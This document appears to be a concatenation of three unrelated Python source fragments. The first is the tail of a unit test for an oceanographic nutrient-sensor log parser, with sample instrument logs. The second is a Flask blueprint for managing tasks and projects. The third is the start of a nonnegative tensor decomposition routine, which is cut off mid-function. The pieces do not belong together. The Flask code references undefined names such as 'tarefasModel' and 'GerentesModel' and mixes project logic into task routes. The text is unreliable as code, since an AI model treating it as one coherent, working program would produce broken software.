2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
LONG_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:31:14.041 SATNLC0239,2012348,15.519770,-5.28,18.39,-27.76,0.59,0.000212
2012/12/13 15:31:15.350 SATNLC0239,2012348,15.520128,-7.57,32.65,-51.28,0.62,0.000186
2012/12/13 15:31:16.695 SATNLC0239,2012348,15.520501,-6.17,24.43,-37.71,0.60,0.000218
2012/12/13 15:31:18.015 SATNLC0239,2012348,15.520875,-5.59,18.68,-28.01,0.60,0.000166
2012/12/13 15:31:19.342 SATNLC0239,2012348,15.521232,-7.30,30.87,-48.21,0.62,0.000235
2012/12/13 15:31:20.704 SATNLC0239,2012348,15.521605,-7.52,31.35,-49.03,0.63,0.000240
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
BAD_TEST_DATA = """
2012/12/13 15:29:20.362 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:30:06.455 [nutnr:DLOGP1]:S
2012/12/13 15:30:06.676 [nutnr:DLOGP1]:O
2012/12/13 15:30:06.905 [nutnr:DLOGP1]:S
2012/12/13 15:30:07.130 [nutnr:DLOGP1]:Y
2012/12/13 15:30:07.355 [nutnr:DLOGP1]:1
2012/12/13 15:30:07.590 [nutnr:DLOGP1]:T
2012/12/13 15:30:07.829 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.052 [nutnr:DLOGP1]:3
2012/12/13 15:30:08.283 [nutnr:DLOGP1]:L
2012/12/13 15:30:08.524 [nutnr:DLOGP1]:Y
2012/12/13 15:30:08.743 [nutnr:DLOGP1]:1
2012/12/13 15:30:08.969 [nutnr:DLOGP1]:D
2012/12/13 15:30:09.194 [nutnr:DLOGP1]:Y
2012/12/13 15:30:09.413 [nutnr:DLOGP1]:0
2012/12/13 15:30:09.623 [nutnr:DLOGP1]:Q
2012/12/13 15:30:09.844 [nutnr:DLOGP1]:D
2012/12/13 15:30:10.096 [nutnr:DLOGP1]:O
2012/12/13 15:30:10.349 [nutnr:DLOGP1]:Y
2012/12/13 15:30:10.570 [nutnr:DLOGP1]:5
2012/12/13 15:30:10.779 [nutnr:DLOGP1]:Q
2012/12/13 15:30:10.990 [nutnr:DLOGP1]:Q
2012/12/13 15:30:11.223 [nutnr:DLOGP1]:Y
2012/12/13 15:30:11.703 [nutnr:DLOGP1]:Y
2012/12/13 15:30:12.841 [nutnr:DLOGP1]:2012/12/13 15:30:11
2012/12/13 15:30:13.261 [nutnr:DLOGP1]:Instrument started with initialize
2012/12/13 15:30:19.270 [nutnr:DLOGP1]:onds.
2012/12/13 15:30:20.271 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:30:21.272 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:30:22.272 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:30:23.273 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:30:24.273 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:30:25.274 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:30:26.275 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:30:27.275 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:30:28.309 [nutnr:DLOGP1]:12/13/2012 15:30:26: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:30:59.889 [nutnr:DLOGP1]: ++++++++++ charged
2012/12/13 15:31:00.584 [nutnr:DLOGP1]: ON Spectrometer.
2012/12/13 15:31:01.366 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Spectrometer powered up.
2012/12/13 15:31:01.435 [nutnr:DLOGP1]:12/13/2012 15:30:59: Message: Turning ON UV light source.
2012/12/13 15:31:06.917 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: UV light source powered up.
2012/12/13 15:31:07.053 [nutnr:DLOGP1]:12/13/2012 15:31:04: Message: Data log file is 'DATA\SCH12348.DAT'.
2012\12\13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000
SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231
2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191
2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203
2012/12/13 15:42:25.429 [nutnr:DLOGP1]:ISUS will start in 15 seconds.
2012/12/13 15:42:26.430 [nutnr:DLOGP1]:ISUS will start in 14 seconds.
2012/12/13 15:42:27.431 [nutnr:DLOGP1]:ISUS will start in 13 seconds.
2012/12/13 15:42:28.431 [nutnr:DLOGP1]:ISUS will start in 12 seconds.
2012/12/13 15:42:29.432 [nutnr:DLOGP1]:ISUS will start in 11 seconds.
2012/12/13 15:42:30.433 [nutnr:DLOGP1]:ISUS will start in 10 seconds.
2012/12/13 15:42:31.434 [nutnr:DLOGP1]:ISUS will start in 9 seconds.
2012/12/13 15:42:32.435 [nutnr:DLOGP1]:ISUS will start in 8 seconds.
2012/12/13 15:42:33.436 [nutnr:DLOGP1]:ISUS will start in 7 seconds.
2012/12/13 15:42:34.436 [nutnr:DLOGP1]:ISUS will start in 6 seconds.
2012/12/13 15:42:35.437 [nutnr:DLOGP1]:ISUS will start in 5 seconds.
2012/12/13 15:42:36.438 [nutnr:DLOGP1]:ISUS will start in 4 seconds.
2012/12/13 15:42:37.438 [nutnr:DLOGP1]:ISUS will start in 3 seconds.
2012/12/13 15:42:38.439 [nutnr:DLOGP1]:ISUS will start in 2 seconds.
2012/12/13 15:42:39.440 [nutnr:DLOGP1]:ISUS will start in 1 seconds.
2012/12/13 15:42:40.440 [nutnr:DLOGP1]:ISUS will start in 0 seconds.
2012/12/13 15:42:41.474 [nutnr:DLOGP1]:12/13/2012 15:42:38: Message: Entering low power suspension, waiting for trigger.
2012/12/13 15:45:26.795 [nutnr:DLOGP1]:Idle state, without initialize
2012/12/13 15:45:46.793 [nutnr:DLOGP1]:Instrument started
2012/12/13 17:51:53.412 [nutnr:DLOGP1]:S
2012/12/13 17:51:53.633 [nutnr:DLOGP1]:O
2012/12/13 17:51:53.862 [nutnr:DLOGP1]:S
2012/12/13 17:51:54.088 [nutnr:DLOGP1]:Y
2012/12/13 17:51:54.312 [nutnr:DLOGP1]:1
2012/12/13 17:51:54.548 [nutnr:DLOGP1]:T
2012/12/13 17:51:54.788 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.011 [nutnr:DLOGP1]:3
2012/12/13 17:51:55.243 [nutnr:DLOGP1]:L
2012/12/13 17:51:55.483 [nutnr:DLOGP1]:Y
2012/12/13 17:51:55.702 [nutnr:DLOGP1]:1
2012/12/13 17:51:55.928 [nutnr:DLOGP1]:D
2012/12/13 17:51:56.154 [nutnr:DLOGP1]:Y
2012/12/13 17:51:56.373 [nutnr:DLOGP1]:0
2012/12/13 17:51:56.582 [nutnr:DLOGP1]:Q
2012/12/13 17:51:56.803 [nutnr:DLOGP1]:D
2012/12/13 17:51:57.055 [nutnr:DLOGP1]:O
2012/12/13 17:51:57.308 [nutnr:DLOGP1]:Y
2012/12/13 17:51:57.529 [nutnr:DLOGP1]:5
2012/12/13 17:51:57.738 [nutnr:DLOGP1]:Q
2012/12/13 17:51:57.948 [nutnr:DLOGP1]:Q
2012/12/13 17:51:58.181 [nutnr:DLOGP1]:Y
2012/12/13 17:51:58.659 [nutnr:DLOGP1]:Y
2012/12/13 17:51:59.747 [nutnr:DLOGP1]:2012/12/13 17:51:58
2012/12/13 17:52:00.166 [nutnr:DLOGP1]:Instrument started with initialize
"""
def state_callback(self, pos, file_ingested):
""" Call back method to watch what comes in via the position callback """
log.trace("SETTING state_callback_value to " + str(pos))
self.position_callback_value = pos
self.file_ingested = file_ingested
def pub_callback(self, pub):
""" Call back method to watch what comes in via the publish callback """
log.trace("SETTING publish_callback_value to " + str(pub))
self.publish_callback_value = pub
def setUp(self):
ParserUnitTestCase.setUp(self)
self.config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.nutnrb',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'NutnrbDataParticle'
}
# not a DataSourceLocation...its just the parser
self.position = {StateKey.POSITION: 0}
self.particle_a = NutnrbDataParticle("2012/12/13 15:31:08.726 SATNDC0239,2012348,15.518322,0.00,0.00,0.00,0.00,0.000000\n")
self.particle_b = NutnrbDataParticle("2012/12/13 15:31:10.065 SATNLC0239,2012348,15.518666,-5.48,20.38,-31.12,0.59,0.000231\n")
self.particle_c = NutnrbDataParticle("2012/12/13 15:31:11.405 SATNLC0239,2012348,15.519024,-6.38,24.24,-37.41,0.61,0.000191\n")
self.particle_d = NutnrbDataParticle("2012/12/13 15:31:12.720 SATNLC0239,2012348,15.519397,-6.77,24.80,-38.00,0.62,0.000203\n")
self.particle_e = NutnrbDataParticle("2012/12/13 15:31:14.041 SATNLC0239,2012348,15.519770,-5.28,18.39,-27.76,0.59,0.000212\n")
self.particle_z = NutnrbDataParticle("2012/12/13 15:31:20.704 SATNLC0239,2012348,15.521605,-7.52,31.35,-49.03,0.63,0.000240\n")
self.position_callback_value = None
self.publish_callback_value = None
def assert_result(self, result, position, particle):
self.assertEqual(result, [particle])
self.assertEqual(self.parser._state[StateKey.POSITION], position)
self.assertEqual(self.position_callback_value[StateKey.POSITION], position)
self.assert_(isinstance(self.publish_callback_value, list))
self.assertEqual(self.publish_callback_value[0], particle)
def test_happy_path(self):
"""
Test the happy path of operations where the parser takes the input
and spits out a valid data particle given the stream.
"""
new_state = {}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(1)
self.assert_result(result, 2458, self.particle_a)
result = self.parser.get_records(1)
self.assert_result(result, 2544, self.particle_b)
result = self.parser.get_records(1)
self.assert_result(result, 2630, self.particle_c)
result = self.parser.get_records(1)
self.assert_result(result, 2716, self.particle_d)
# no data left, dont move the position
result = self.parser.get_records(1)
self.assertEqual(result, [])
self.assertEqual(self.parser._state[StateKey.POSITION], 2716)
self.assertEqual(self.position_callback_value[StateKey.POSITION], 2716)
self.assert_(isinstance(self.publish_callback_value, list))
self.assertEqual(self.publish_callback_value[0], self.particle_d)
def test_get_many(self):
new_state = {}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(2)
self.assertEqual(result, [self.particle_a, self.particle_b])
self.assertEqual(self.parser._state[StateKey.POSITION], 2544)
self.assertEqual(self.position_callback_value[StateKey.POSITION], 2544)
self.assertEqual(self.publish_callback_value[0], self.particle_a)
self.assertEqual(self.publish_callback_value[1], self.particle_b)
def test_bad_data(self):
# There's a bad sample in the data! Ack! Skip it!
new_state = {}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.BAD_TEST_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(1)
self.assert_result(result, 2603, self.particle_c)
def test_long_stream(self):
new_state = {}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.LONG_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(11)
self.assertEqual(result[-1], self.particle_z)
self.assertEqual(self.parser._state[StateKey.POSITION], 3232)
self.assertEqual(self.position_callback_value[StateKey.POSITION], 3232)
self.assertEqual(self.publish_callback_value[-1], self.particle_z)
def test_mid_state_start(self):
new_state = {StateKey.POSITION:2628}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, new_state, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(1)
self.assert_result(result, 2716, self.particle_d)
def reset_parser(self, state = {}):
self.state_callback_values = []
self.publish_callback_values = []
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, state, self.stream_handle,
self.state_callback, self.pub_callback)
def test_set_state(self):
new_state = {StateKey.POSITION: 2544}
self.stream_handle = StringIO(NutnrbParserUnitTestCase.TEST_DATA)
self.parser = NutnrbParser(self.config, self.position, self.stream_handle,
self.state_callback, self.pub_callback)
result = self.parser.get_records(1)
self.assert_result(result, 2458, self.particle_a)
self.reset_parser(new_state)
self.parser.set_state(new_state) # seek to after particle_b
result = self.parser.get_records(1)
#
# If particles C and D appear, but the position is off
# it is because you are not consuming newlines in your
# DATA_REGEX pattern
#
self.assert_result(result, 2630, self.particle_c)
result = self.parser.get_records(1)
self.assert_result(result, 2716, self.particle_d)
| StarcoderdataPython |
106438 | #!/usr/bin/python
from flask import Blueprint,render_template,request,jsonify
from Models.TerminusModel import db, Projetos as ProjetosModel, Clientes as ClientesModel, Tarefas as TarefasModel
tarefas = Blueprint("tarefas",__name__)
@tarefas.route("/tarefas")
def tarefas_index():
tarefas = db.session.query(tarefasModel).all()
return render_template("tarefas.html",tarefas=tarefas)
@tarefas.route("/projetos/<id>/tarefas",methods=["POST"])
def salvar_tarefas(id):
tarefa = TarefasModel()
try:
titulo = request.form["titulo"]
descricao = request.form["descricao"]
tarefa.titulo = titulo
tarefa.descricao = descricao
db.session.add(tarefa)
projeto = db.session.query(ProjetosModel).filter(ProjetosModel.id==id).first()
projeto.tarefas.append(tarefa)
db.session.commit()
return jsonify({"message":"Tarefa Cadastrada com Sucesso!","status":0})
except Exception as e:
db.session.rollback()
return jsonify({"message":"Falhou ao cadastrar tarefa %s"%e,"status":1})
@tarefas.route("/tarefas/<id>/execucao")
def execucao(id):
return render_template("execucao.html")
@tarefas.route("/tarefas/novo")
def novo_projeto():
clientes = db.session.query(ClientesModel).all()
gerentes = db.session.query(GerentesModel).all()
return render_template("novo_projeto.html",gerentes=gerentes,clientes=clientes)
@tarefas.route("/tarefas/novo",methods=["POST"])
def salvar_projeto():
nome = request.form['nome']
cliente = request.form['cliente']
gerente = request.form['gerente']
objetivo = request.form['objetivo']
cenario_atual = request.form['cenario_atual']
cenario_proposto = request.form['cenario_proposto']
data_inicio = request.form['data_inicio']
data_termino = request.form['data_termino']
valor = request.form['valor']
projeto = tarefasModel()
try:
projeto = tarefasModel()
projeto.nome = nome
projeto.cliente_id = int(cliente)
projeto.gerente_id = int(gerente)
projeto.objetivo = objetivo
projeto.cenario_atual = cenario_atual
projeto.cenario_proposto = cenario_proposto
projeto.data_inicio = data_inicio
projeto.data_termino = data_termino
projeto.valor = valor
db.session.add(projeto)
db.session.commit()
return render_template("novo_projeto.html",message="Projeto salvo com sucesso!",status=0)
except Exception as e:
print "Deu erro! ",e
return render_template("novo_projeto.html",message="Falhou ao salvar o projeto! %s"%e,status=1)
| StarcoderdataPython |
8733 | """
Nonnegative CP decomposition by Hierarchical alternating least squares (HALS).
With support for missing data.
"""
import numpy as np
import scipy as sci
from scipy import linalg
from tensortools.operations import unfold, khatri_rao
from tensortools.tensors import KTensor
from tensortools.optimize import FitResult, optim_utils
from .._hals_update import _hals_update
def mncp_hals(X, rank, mask, random_state=None, init='rand', **options):
"""
Fits nonnegtaive CP Decomposition using the Hierarcial Alternating Least
Squares (HALS) Method. Supports missing data.
Parameters
----------
X : (I_1, ..., I_N) array_like
A real array with nonnegative entries and ``X.ndim >= 3``.
rank : integer
The `rank` sets the number of components to be computed.
mask : (I_1, ..., I_N) array_like
A binary tensor with the same shape as ``X``. All entries equal to zero
correspond to held out or missing data in ``X``. All entries equal to
one correspond to observed entries in ``X`` and the decomposition is
fit to these datapoints.
random_state : integer, RandomState instance or None, optional (default ``None``)
If integer, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used by np.random.
init : str, or KTensor, optional (default ``'rand'``).
Specifies initial guess for KTensor factor matrices.
If ``'randn'``, Gaussian random numbers are used to initialize.
If ``'rand'``, uniform random numbers are used to initialize.
If KTensor instance, a copy is made to initialize the optimization.
options : dict, specifying fitting options.
tol : float, optional (default ``tol=1E-5``)
Stopping tolerance for reconstruction error.
max_iter : integer, optional (default ``max_iter = 500``)
Maximum number of iterations to perform before exiting.
min_iter : integer, optional (default ``min_iter = 1``)
Minimum number of iterations to perform before exiting.
max_time : integer, optional (default ``max_time = np.inf``)
Maximum computational time before exiting.
verbose : bool ``{'True', 'False'}``, optional (default ``verbose=True``)
Display progress.
Returns
-------
result : FitResult instance
Object which holds the fitted results. It provides the factor matrices
in form of a KTensor, ``result.factors``.
Notes
-----
This implemenation is using the Hierarcial Alternating Least Squares Method.
References
----------
Cichocki, Andrzej, and <NAME>. "Fast local algorithms for
large scale nonnegative matrix and tensor factorizations."
IEICE transactions on fundamentals of electronics, communications and
computer sciences 92.3: 708-721, 2009.
Examples
--------
"""
# Mask missing elements.
X = np.copy(X)
X[~mask] = np.linalg.norm(X[mask])
# Check inputs.
optim_utils._check_cpd_inputs(X, rank)
# Initialize problem.
U, normX = optim_utils._get_initial_ktensor(init, X, rank, random_state)
result = FitResult(U, 'NCP_HALS', **options)
# Store problem dimensions.
normX = linalg.norm(X[mask].ravel())
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
